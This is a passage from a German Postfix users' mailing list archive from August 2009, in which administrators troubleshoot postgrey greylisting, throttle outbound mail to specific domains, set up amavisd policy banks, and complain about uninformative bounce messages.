*@lists.debian.org liszt.debian.org whitelist_from_rcvd *@pureftpd.org pureftpd.org whitelist_from_rcvd *@nongnu.org lists.gnu.org Bei jeder neuen Mailing-Liste muss ich dann eine neue Zeile einfügen und Amavis neu starten. Da das komplette Restsystem aber schon an 2 LDAP-Servern hängt wäre hier natürlich eine LDAP-Lösung für SpamAssassin schön. Ich habe jetzt gegoggelt *g* und LDAPfilter von 2005 gefunden. Nun meine Frage: Hat das schon mal irgendwer getestet oder sogar im Einsatz? Funktioniert so ein Plugin auch in aktuellen SpamAssassin-Versionen? Oder irgend eine andere Idee? Würde mich da sehr freuen Grüße Christian -- Roessner Network Solutions (R.N.S.) Licher Str. 19a, 35394 Gießen Telefon: +49 641 5879091, Mobil: +49 176 93118939 USt-IdNr.: DE225643613 URL: http://www.roessner-net.com/ PGP: http://www.roessner-net.com/0x6B929997.asc From ralf at suppenuser.de Fri Aug 14 12:19:57 2009 From: ralf at suppenuser.de (Ralf Kayser) Date: Fri, 14 Aug 2009 12:19:57 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postausgang_beschr=E4nken?= Message-ID: <007d01ca1cc8$c8abf530$5a03df90$@de> Hi all Vor Urzeiten hat man hier auf der Liste darüber diskutiert, wie man den Versand pro Empfangsdomain drosseln kann. Irgendwas war da mit transport Leider finde ich das Teil nicht mehr ;( Ich soll bei Mails, die an yahoo.* oder web.de gehen jeweils nur z.B. 5 gleichzeitig durchlassen (also ein rate_limit in die andere Richtung) und bring es derzeit nicht hin. Könnt Ihr mir auf die Sprünge helfen? Viele Grüße Ralf... From cite+postfix-buch at incertum.net Fri Aug 14 12:52:25 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 14 Aug 2009 12:52:25 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de> <20090810114919.GA29820@mail.incertum.net> <410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de> Message-ID: <20090814105225.GS31881@mail.incertum.net> * F.Guenther at t-systems.com: > Aug 14 09:36:38 mail postgrey[8200]: 2009/08/14-09:36:38 Server closing! > Aug 14 09:36:38 mail postgrey[8200]: Couldn't unlink "/var/run/postgrey.pid" [Permission denied] > Aug 14 09:36:39 mail postgrey[9256]: Process Backgrounded > Aug 14 09:36:39 mail postgrey[9256]: 2009/08/14-09:36:39 postgrey (type Net::Server::Multiplex) starting! pid(9256) > Aug 14 09:36:39 mail postgrey[9256]: Binding to TCP port 60000 on host 127.0.0.1 > Aug 14 09:36:39 mail postgrey[9256]: Setting gid to "120 120" > Aug 14 09:36:39 mail postgrey[9256]: Setting uid to "109" Wenn das, wie ich vermute, eine Debian-Installation ist, dann kannst Du den Fehler komplett ignorieren. Das Verzeichnis /var/run ist nicht zum Beschreiben durch den User "postgrey" geeignet, und postgrey ändert seine UID/GID schon bevor er das PID-File anlegen will. Das Verhalten ist bekannt, und der Workaround unter Debian ist die Verwendung von "start-stop-daemon" mit der "pidfile"-Option. Funktioniert perfekt. Falls Dich diese Kosmetik stört, dann steht es Dir frei, unter /var/run ein Verzeichnis "postgrey" anzuelgen, dieses mittels dpkg-statoverride bekannt zu geben, die Permissions anzupassen, da Startskript und die Konfiguration zu ändern etc. pp. - aber das ist halt wieder nur eines: Aufwand. > 2. Im mail- und syslog kann ich keine Einträge von postgrey finden, > auch nicht wenn ich meine o.g. testmails verwende. Auch wenn ich zum > start /usr/sbin/postgrey -v -d --inet localhost:60000 benutze? > Postgrey scheint nicht zu tun? Du kannst Dir das Policy-Protokoll unter http://www.postfix.org/SMTPD_POLICY_README.html durchlesen und nach einem beherzten "telnet localhost 60000" selbst mal eine Anfrage stellen. Wenn Du im Log nichts von ihm findest, dann wird er nicht aufgerufen, wahrscheinlich sendest Du Deine Mails von einem Host in $mynetworks, via SASL oder weißt der Geier was. Der von Dir genannte Fehler hat damit nichts zu tun. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 Es ist schon ein großer Trost bei Wahlen, daß von mehreren Kandidaten nur einer gewählt werden kann. From cite+postfix-buch at incertum.net Fri Aug 14 12:55:34 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 14 Aug 2009 12:55:34 +0200 Subject: [Postfixbuch-users] =?utf-8?q?OT=3A_LDAPfilter_f=C3=BCr_SpamAssas?= =?utf-8?q?sin?= In-Reply-To: <1250244247.31792.4.camel@desktop> References: <1250244247.31792.4.camel@desktop> Message-ID: <20090814105534.GT31881@mail.incertum.net> * Christian Roessner : > Ich nutze Amavis als Proxy in Postfix. Im SpamAssassin-Part habe ich ein > paar Whitelistings drin: [...] > Bei jeder neuen Mailing-Liste muss ich dann eine neue Zeile einfügen und > Amavis neu starten. Da das komplette Restsystem aber schon an 2 > LDAP-Servern hängt wäre hier natürlich eine LDAP-Lösung für SpamAssassin > schön. Ich habe jetzt gegoggelt *g* und LDAPfilter von 2005 gefunden. > Nun meine Frage: > > Hat das schon mal irgendwer getestet oder sogar im Einsatz? Funktioniert > so ein Plugin auch in aktuellen SpamAssassin-Versionen? > > Oder irgend eine andere Idee? Würde mich da sehr freuen Ja. Erstelle eine Policy-Bank für Mailinglisten. Und wieder ganz unfein der Verweis auf einen Eintrag von mir zu dem Thema: http://www.incertum.net/archives/389-amavisd-new-Dedizierte-Policy-in-Abhaengigkeit-von-Headern.html Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 Speeding never killed anyone. Stopping did. From cite+postfix-buch at incertum.net Fri Aug 14 12:57:32 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 14 Aug 2009 12:57:32 +0200 Subject: [Postfixbuch-users] =?utf-8?q?Postausgang_beschr=C3=A4nken?= In-Reply-To: <007d01ca1cc8$c8abf530$5a03df90$@de> References: <007d01ca1cc8$c8abf530$5a03df90$@de> Message-ID: <20090814105732.GU31881@mail.incertum.net> * Ralf Kayser : > Ich soll bei Mails, die an yahoo.* oder web.de gehen jeweils nur z.B. 5 > gleichzeitig durchlassen (also ein rate_limit in die andere Richtung) und > bring es derzeit nicht hin. Das Vorgehen ist im Prinzip identisch zu dem in http://www.postfix.org/QSHAPE_README.html#backlog beschriebenen: 1. smtp-Transport in master.cf klonen (nennen wir ihn "slow"). 2. main.cf: slow_destination_concurrency_limit = 5 3. transport_maps-Tabelle anlegen, "web.de slow:", postmappen 4. postfix reload 5. Weißwurstfrühstück Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 Q: Do you know what the death rate around here is? A: One per person. --Anonymous From driessen at fblan.de Fri Aug 14 13:12:59 2009 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 14 Aug 2009 13:12:59 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <20090814105225.GS31881@mail.incertum.net> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de><20090810114919.GA29820@mail.incertum.net><410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de> <20090814105225.GS31881@mail.incertum.net> Message-ID: <000b01ca1cd0$2eea6910$0565a8c0@uwe> On Behalf Of Stefan Förster > > Wenn das, wie ich vermute, eine Debian-Installation ist, dann kannst Er hat Ubuntu > Du den Fehler komplett ignorieren. Das Verzeichnis /var/run ist nicht > zum Beschreiben durch den User "postgrey" geeignet, und postgrey > ändert seine UID/GID schon bevor er das PID-File anlegen will. Öhm ich hab Debian und wüste nicht das ich in der Richtung irgendwas geändert hätte. > > Das Verhalten ist bekannt, und der Workaround unter Debian ist die > Verwendung von "start-stop-daemon" mit der "pidfile"-Option. > Funktioniert perfekt. Evtl. hat das Startscript unter Ubuntu auch einen Fehler hier mal das von Debian testing set -e PATH=/sbin:/bin:/usr/sbin:/usr/bin DAEMON=/usr/sbin/postgrey NAME=postgrey DESC="postfix greylisting daemon" PIDFILE=/var/run/$NAME.pid SCRIPTNAME=/etc/init.d/$NAME # Gracefully exit if the package has been removed. test -x $DAEMON || exit 0 # Read config file if it is present. if [ -r /etc/default/$NAME ] then . /etc/default/$NAME fi POSTGREY_OPTS="--pidfile=$PIDFILE --daemonize $POSTGREY_OPTS" if [ -z "$POSTGREY_TEXT" ]; then POSTGREY_TEXT_OPT="" else POSTGREY_TEXT_OPT="--greylist-text=$POSTGREY_TEXT" fi case "$1" in start) echo -n "Starting $DESC: $NAME" start-stop-daemon --start --quiet --pidfile $PIDFILE \ --exec $DAEMON -- $POSTGREY_OPTS "$POSTGREY_TEXT_OPT" echo "." ;; stop) echo -n "Stopping $DESC: $NAME" start-stop-daemon --stop --quiet --pidfile $PIDFILE --oknodo rm -f $PIDFILE echo "." ;; reload|force-reload) echo -n "Reloading $DESC configuration..." start-stop-daemon --stop --signal 1 --quiet --pidfile $PIDFILE echo "done." ;; restart) echo -n "Restarting $DESC: $NAME" start-stop-daemon --stop --quiet --oknodo --pidfile $PIDFILE rm -f $PIDFILE sleep 1 start-stop-daemon --start --quiet --pidfile $PIDFILE \ --exec $DAEMON -- $POSTGREY_OPTS "$POSTGREY_TEXT_OPT" echo "." ;; *) echo "Usage: $SCRIPTNAME {start|stop|restart|reload|force-reload}" >&2 exit 1 ;; esac exit 0 Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From cite+postfix-buch at incertum.net Fri Aug 14 13:17:29 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 14 Aug 2009 13:17:29 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <000b01ca1cd0$2eea6910$0565a8c0@uwe> References: <20090814105225.GS31881@mail.incertum.net> <000b01ca1cd0$2eea6910$0565a8c0@uwe> Message-ID: <20090814111728.GV31881@mail.incertum.net> * Uwe Driessen : > On Behalf Of Stefan Förster >> Du den Fehler komplett ignorieren. Das Verzeichnis /var/run ist nicht >> zum Beschreiben durch den User "postgrey" geeignet, und postgrey >> ändert seine UID/GID schon bevor er das PID-File anlegen will. > > Öhm ich hab Debian und wüste nicht das ich in der Richtung irgendwas geändert hätte. Der Standard ist: testvm03:~$ ls -ld /var/run drwxr-xr-x 22 root root 4096 Aug 14 12:46 /var/run > rm -f $PIDFILE Das Thema ist durch. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #131: MCSE - Führerschein für die Maus. (Thore Tams) From cite+postfix-buch at incertum.net Fri Aug 14 13:27:35 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 14 Aug 2009 13:27:35 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <20090814105225.GS31881@mail.incertum.net> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de> <20090810114919.GA29820@mail.incertum.net> <410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de> <20090814105225.GS31881@mail.incertum.net> Message-ID: <20090814112735.GX31881@mail.incertum.net> * Stefan Förster : > Das Verzeichnis /var/run ist nicht zum Beschreiben durch den User > "postgrey" geeignet, und postgrey ändert seine UID/GID schon bevor > er das PID-File anlegen will. ^^^^^^^^ löschen Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #59: Freiwillige Selbstkontrolle - Löschen fremder Artikel (Endergone Zwiebeltüte) From ralf at suppenuser.de Fri Aug 14 19:22:30 2009 From: ralf at suppenuser.de (ralf) Date: Fri, 14 Aug 2009 19:22:30 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?Postausgang_beschr=E4nken?= In-Reply-To: <20090814105732.GU31881@mail.incertum.net> References: <007d01ca1cc8$c8abf530$5a03df90$@de> <20090814105732.GU31881@mail.incertum.net> Message-ID: <1250270550.21047.0.camel@srv5.twosteps.net> Hallo, Am Freitag, den 14.08.2009, 12:57 +0200 schrieb Stefan Förster: > * Ralf Kayser : > > Ich soll bei Mails, die an yahoo.* oder web.de gehen jeweils nur z.B. 5 > > gleichzeitig durchlassen (also ein rate_limit in die andere Richtung) und > > bring es derzeit nicht hin. > > Das Vorgehen ist im Prinzip identisch zu dem in > http://www.postfix.org/QSHAPE_README.html#backlog beschriebenen: > > 1. smtp-Transport in master.cf klonen (nennen wir ihn "slow"). > 2. main.cf: slow_destination_concurrency_limit = 5 > 3. transport_maps-Tabelle anlegen, "web.de slow:", postmappen > 4. postfix reload > 5. Weißwurstfrühstück Danke! Das war es. Viele Grüße Ralf From p.heinlein at heinlein-support.de Sat Aug 15 13:32:48 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Sat, 15 Aug 2009 13:32:48 +0200 Subject: [Postfixbuch-users] Was macht man totalen Standardverweigerern? In-Reply-To: <005301ca1cc1$fc37ed70$f4a7c850$@Fietzek@hasec.de> References: <005301ca1cc1$fc37ed70$f4a7c850$@Fietzek@hasec.de> Message-ID: <200908151332.48341.p.heinlein@heinlein-support.de> Am Freitag, 14. August 2009 schrieb Stephan Fietzek: > anscheinend keine neuen Zustellversuche. Da will wohl jemand nicht, > dass seine Mails ankommen. Die Domain der absendenden Server lässt auch > Wie geht ihr mit solchen Totalverweigerern um? Ich respektiere anderer Leute ihre Wünsche. Ich will den doch nicht gegen seinen Willen zum Erfolg zwingen. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein  -- Sitz: Berlin From mailinglist at mbs-technet.com Sun Aug 16 19:18:20 2009 From: mailinglist at mbs-technet.com (Maik Brauer) Date: Sun, 16 Aug 2009 19:18:20 +0200 Subject: [Postfixbuch-users] Client host rejected: Access denied; Message-ID: Hallo, Ich habe noch ein Problem mit der Postfix Configuration. Mail versenden (nach Authentifizierung) nach ausserhalb über dem Postfix ist OK sowie an die Lokalen vom Postfix verwalteten Domains. Sobald aber ein Fremder SMTP-Server Email abladen möchte die auch für meinen Postfix bestimmt sind da dieser die domains verwaltet, bekomme ich im LogFiles folgenden Fehler: postfix/smtpd[7828]: NOQUEUE: reject: RCPT from mx1.xxxx.com[xx.xx.xx.xx]: 554 5.7.1 : Client host rejected: Access denied; from= to= proto=ESMTP helo= Der Sender bekommt natürlich auch eine Fehlermeldung zurück, das die Mail nicht ausgeliefert werden konnte. Kann mir einer einen Tipp geben in welche Richtung ich zu suchen habe. Danke. Grüsse, Maik Brauer From driessen at fblan.de Sun Aug 16 19:35:55 2009 From: driessen at fblan.de (Uwe Driessen) Date: Sun, 16 Aug 2009 19:35:55 +0200 Subject: [Postfixbuch-users] Client host rejected: Access denied; In-Reply-To: References: Message-ID: <001f01ca1e98$0251ad90$0565a8c0@uwe> On Behalf Of Maik Brauer > > > Der Sender bekommt natürlich auch eine Fehlermeldung zurück, das die > Mail nicht ausgeliefert werden konnte. > Kann mir einer einen Tipp geben in welche Richtung ich zu suchen habe. > Danke. In der main.cf da ist alles drin wer was wohin und warum darf. Wenn du von der Liste Hilfe möchtest dann bitte ein postconf -n und kompletten logfileauszug von begin connect bis disconnect. > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From Ralf.Hildebrandt at charite.de Sun Aug 16 20:06:22 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Sun, 16 Aug 2009 20:06:22 +0200 Subject: [Postfixbuch-users] Client host rejected: Access denied; In-Reply-To: References: Message-ID: <20090816180621.GR18745@charite.de> * Maik Brauer : > Hallo, > > Ich habe noch ein Problem mit der Postfix Configuration. > Mail versenden (nach Authentifizierung) nach ausserhalb über dem > Postfix ist OK sowie an die Lokalen vom Postfix > verwalteten Domains. Sobald aber ein Fremder SMTP-Server Email > abladen möchte die auch für meinen Postfix bestimmt sind > da dieser die domains verwaltet, bekomme ich im LogFiles folgenden > Fehler: > > postfix/smtpd[7828]: NOQUEUE: reject: RCPT from > mx1.xxxx.com[xx.xx.xx.xx]: 554 5.7.1 : > Client host rejected: Access denied; from= > to= proto=ESMTP helo= postconf -n ? -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From F.Guenther at t-systems.com Mon Aug 17 09:39:07 2009 From: F.Guenther at t-systems.com (F.Guenther at t-systems.com) Date: Mon, 17 Aug 2009 09:39:07 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <000b01ca1cd0$2eea6910$0565a8c0@uwe> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de><20090810114919.GA29820@mail.incertum.net><410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de><20090814105225.GS31881@mail.incertum.net> <000b01ca1cd0$2eea6910$0565a8c0@uwe> Message-ID: <410895869A205548A19FE0746861331C07E412D8@S4DE9JSAAIG.ost.t-com.de> Habe Skrik kontrolliert, sieht genau so aus und dann mal diesen Inhalt eingefügt.... Verhält sich auch genau wie vorher Trozudem DANKE Evtl. hat das Startscript unter Ubuntu auch einen Fehler hier mal das von Debian testing set -e PATH=/sbin:/bin:/usr/sbin:/usr/bin DAEMON=/usr/sbin/postgrey NAME=postgrey DESC="postfix greylisting daemon" PIDFILE=/var/run/$NAME.pid SCRIPTNAME=/etc/init.d/$NAME # Gracefully exit if the package has been removed. test -x $DAEMON || exit 0 # Read config file if it is present. if [ -r /etc/default/$NAME ] then . /etc/default/$NAME fi POSTGREY_OPTS="--pidfile=$PIDFILE --daemonize $POSTGREY_OPTS" if [ -z "$POSTGREY_TEXT" ]; then POSTGREY_TEXT_OPT="" else POSTGREY_TEXT_OPT="--greylist-text=$POSTGREY_TEXT" fi case "$1" in start) echo -n "Starting $DESC: $NAME" start-stop-daemon --start --quiet --pidfile $PIDFILE \ --exec $DAEMON -- $POSTGREY_OPTS "$POSTGREY_TEXT_OPT" echo "." ;; stop) echo -n "Stopping $DESC: $NAME" start-stop-daemon --stop --quiet --pidfile $PIDFILE --oknodo rm -f $PIDFILE echo "." ;; reload|force-reload) echo -n "Reloading $DESC configuration..." start-stop-daemon --stop --signal 1 --quiet --pidfile $PIDFILE echo "done." ;; restart) echo -n "Restarting $DESC: $NAME" start-stop-daemon --stop --quiet --oknodo --pidfile $PIDFILE rm -f $PIDFILE sleep 1 start-stop-daemon --start --quiet --pidfile $PIDFILE \ --exec $DAEMON -- $POSTGREY_OPTS "$POSTGREY_TEXT_OPT" echo "." ;; *) echo "Usage: $SCRIPTNAME {start|stop|restart|reload|force-reload}" >&2 exit 1 ;; esac exit 0 Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listen.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From driessen at fblan.de Mon Aug 17 11:15:52 2009 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 17 Aug 2009 11:15:52 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <410895869A205548A19FE0746861331C07E412D8@S4DE9JSAAIG.ost.t-com.de> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de><20090810114919.GA29820@mail.incertum.net><410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de><20090814105225.GS31881@mail.incertum.net><000b01ca1cd0$2eea6910$0565a8c0@uwe> <410895869A205548A19FE0746861331C07E412D8@S4DE9JSAAIG.ost.t-com.de> Message-ID: <000401ca1f1b$51c62a80$0565a8c0@uwe> On Behalf Of F.Guenther at t-systems.com > > Habe Skrik kontrolliert, sieht genau so aus und dann mal diesen Inhalt eingefügt.... > Verhält sich auch genau wie vorher > Trozudem DANKE > Wie hast du installiert? Per apt-get oder selber übersetzt? (ist zwar "nur" ein Perlscript..) Hast du Postgrey auch mal mit remove --purge rausgeworfen und mal neu installiert? Was steht in der /etc/default/postgrey Irgendwelche Änderungen in /etc/postgrey/whitelist* vorgenommen? Welche Version von Postgrey ist installiert worden? postgrey --version ps aux|grep postgrey ? Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From F.Guenther at t-systems.com Mon Aug 17 12:24:47 2009 From: F.Guenther at t-systems.com (F.Guenther at t-systems.com) Date: Mon, 17 Aug 2009 12:24:47 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <000401ca1f1b$51c62a80$0565a8c0@uwe> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de><20090810114919.GA29820@mail.incertum.net><410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de><20090814105225.GS31881@mail.incertum.net><000b01ca1cd0$2eea6910$0565a8c0@uwe><410895869A205548A19FE0746861331C07E412D8@S4DE9JSAAIG.ost.t-com.de> <000401ca1f1b$51c62a80$0565a8c0@uwe> Message-ID: <410895869A205548A19FE0746861331C07E41447@S4DE9JSAAIG.ost.t-com.de> Ich sehe den nicht Arbeiten, wenn ich alle anderen richtig verstanden habe, ist die Meldung zu vernachlässigen. Wie kann ich den den postgrey dazu zwingen was zu machen? Telnet localhost 60000 macht nichts bei mir: telnet localhost 60000 Trying 127.0.0.1... Connected to localhost.localdomain. Escape character is '^]'. Das heißt für micht auf 60000 lauscht einer und nimmt auch was an. Was kann ich jetzt noch machen um Postgrey dazu bekommen was in das log zu schreiben. > > Habe Skrik kontrolliert, sieht genau so aus und dann mal diesen Inhalt eingefügt.... > Verhält sich auch genau wie vorher > Trozudem DANKE > Wie hast du installiert? Per apt-get oder selber übersetzt? (ist zwar "nur" ein Perlscript..) apt-get Hast du Postgrey auch mal mit remove --purge rausgeworfen und mal neu installiert? Ja das Original (apt-get) und auch diese Version dpkg -i postgrey_1.31-2_all.deb (download) zeigen den gleichen Fehler Was steht in der /etc/default/postgrey Nach dieser Neuinstallation Nur noch das: POSTGREY_OPTS="--inet=127.0.0.1:60000" Irgendwelche Änderungen in /etc/postgrey/whitelist* vorgenommen? Da gibt's die clients: ... Viele Einträge (bei der neuen Version) Und recipients ... Nur postmaster@ und abuse@ Welche Version von Postgrey ist installiert worden? postgrey_1.31-2 postgrey --version ps aux|grep postgrey ? postgrey 19504 0.0 0.3 12580 8184 ? Ss 11:24 0:00 /usr/sbin/postgrey --pidfile=/var/run/postgrey.pid --daemonize --inet=127.0.0.1:60000 Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listen.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From driessen at fblan.de Mon Aug 17 12:42:53 2009 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 17 Aug 2009 12:42:53 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <410895869A205548A19FE0746861331C07E41447@S4DE9JSAAIG.ost.t-com.de> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de><20090810114919.GA29820@mail.incertum.net><410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de><20090814105225.GS31881@mail.incertum.net><000b01ca1cd0$2eea6910$0565a8c0@uwe><410895869A205548A19FE0746861331C07E412D8@S4DE9JSAAIG.ost.t-com.de><000401ca1f1b$51c62a80$0565a8c0@uwe> <410895869A205548A19FE0746861331C07E41447@S4DE9JSAAIG.ost.t-com.de> Message-ID: <000601ca1f27$796331d0$0565a8c0@uwe> On Behalf Of F.Guenther at t-systems.com > > Ich sehe den nicht Arbeiten, wenn ich alle anderen richtig verstanden habe, ist die > Meldung zu vernachlässigen. Wie kann ich den den postgrey dazu zwingen was zu machen? > Telnet localhost 60000 macht nichts bei mir: > telnet localhost 60000 > Trying 127.0.0.1... > Connected to localhost.localdomain. > Escape character is '^]'. Das heißt für micht auf 60000 lauscht einer und nimmt auch > was an. Was kann ich jetzt noch machen um > Postgrey dazu bekommen was in das log zu schreiben. Also rennt er schon mal > > /etc/default/postgrey > > Nach dieser Neuinstallation > Nur noch das: > POSTGREY_OPTS="--inet=127.0.0.1:60000" Dann ändere mal in POSTGREY_OPTS="--inet=127.0.0.1:60000 --greylist-action=450" Postgrey ist im standard auf defer if permit eingestellt also rejecte nur wenn alles andere ok ist Obiges macht grundsätzlich erstmal ein Greylisting, beendet alle weiteren checks und erst beim 2. mal werden die nachfolgenden aktion/restriktionen ausgeführt. Deshalb kommen bei mir erst danach die ganzen RBL's. wer nicht sofort angenommen wird muß auch nicht gegen die RBL's geprüft werden. Wer nicht wiederkommt braucht auch nicht geprüft werden. Als Steigerung kannst du dann das Greylisting noch selektiv laufen lassen mit einer restriktion_class.(findest du hier auf der Liste) Und damit die Spamer nicht unbedingt erkennen das bei dir ein Greylisting rennt ändere die Meldung mit POSTGREY_TEXT="Sorry for the silly things, come later thanks, you have to pay 20 cent for your Mail" Text nach belieben Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From leo.unglaub at gmail.com Mon Aug 17 15:53:07 2009 From: leo.unglaub at gmail.com (Leo Unglaub) Date: Mon, 17 Aug 2009 15:53:07 +0200 Subject: [Postfixbuch-users] einheitliche Bounces Message-ID: Hallo Liste, ich habe folgendess Problem: Ich muss immer öfter für Kunden Bounce-Mails analysieren, da diese die Mails nicht verstehen. Am Anfang war das noch leicht, aber irgend wie halten sich immer weniger Mailserver an die gänigen Konfentionen. Ich bekomme immer öfters zum beispiel nur solche Bounce-Mails: This is an automatically generated Delivery Status Notification. > > Delivery to the following recipients failed. Das wars, mehr infos stehen da nicht mit drin. Das sind meistens Behörten und Staatliche Stellen. Daher wollte ich fragen wie da die genaue Situation ist. Sind die Bounce Mails in einem RFC strikt definiert oder sind das eher Vorgaben die aber nicht pflicht sind? Ich erinnere mich an die Stelle im Psotfix-Buch, finde Sie aber akut gerade nicht. Ich frage weil ich ernsthaft überlege diese Domains bei RFC-Ignorant zu melden, da auf Abuse und co auch niemand antwortet. Oder ist mein Vorgehen da zu übertrieben? Wie handelt ihr solche Regelverstöße? Vielen Dank und viele Grüße Leo -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From driessen at fblan.de Mon Aug 17 17:06:49 2009 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 17 Aug 2009 17:06:49 +0200 Subject: [Postfixbuch-users] einheitliche Bounces In-Reply-To: References: Message-ID: <001b01ca1f4c$58768ba0$0565a8c0@uwe> On Behalf Of Leo Unglaub > > Hallo Liste, > ich habe folgendess Problem: Ich muss immer öfter für Kunden Bounce-Mails analysieren, > da diese die Mails nicht verstehen. Am Anfang war das noch leicht, aber irgend wie > halten sich immer weniger Mailserver an die gänigen Konfentionen. Ich bekomme immer > öfters zum beispiel nur solche Bounce-Mails: > > > > This is an automatically generated Delivery Status Notification. > > Delivery to the following recipients failed. Bissel wenig aber es steht immerhin da das die Mail nicht angekommen ist > > > Das wars, mehr infos stehen da nicht mit drin. Das sind meistens Behörten und Staatliche > Stellen. Daher wollte ich fragen wie da die genaue Situation ist. Sind die Bounce Mails > in einem RFC strikt definiert oder sind das eher Vorgaben die aber nicht pflicht sind? Keine Ahnung aber es gehört eigentlich zum guten Ton den Grund der Ablehnung mitzuteilen. Sehr wahrscheinlich wird man die Auskunft bekommen das da so eine rote, blaue oder gar orange schwarze Büchse das ganze regelt und aus Datenschutzrechtlichen Gründen wird der genau Grund nicht mitgeteilt da der Absender ja ansonsten was dafür tun könnte das seine Mail doch ankommt. > Ich erinnere mich an die Stelle im Psotfix-Buch, finde Sie aber akut gerade nicht. Ich > frage weil ich ernsthaft überlege diese Domains bei RFC-Ignorant zu melden, da auf Abuse > und co auch niemand antwortet. Oder ist mein Vorgehen da zu übertrieben? Nö wieso übertrieben eigentlich gehören gerade diese "staatlichen" von der Kommunikation komplett ausgenommen denn diese sollten eigentlich Vorbilder sein und sich an die Regeln des Miteinander halten. Die werden von uns bezahlt wir können auch zum großen Teil ohne die nur die nicht ohne uns! > > Wie handelt ihr solche Regelverstöße? Einwerfen *gg (Kein Postmaster, Kein Abuse mit wem soll man denn da im Problemfall reden) > Vielen Dank und viele Grüße > Leo Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From cite+postfix-buch at incertum.net Tue Aug 18 10:52:36 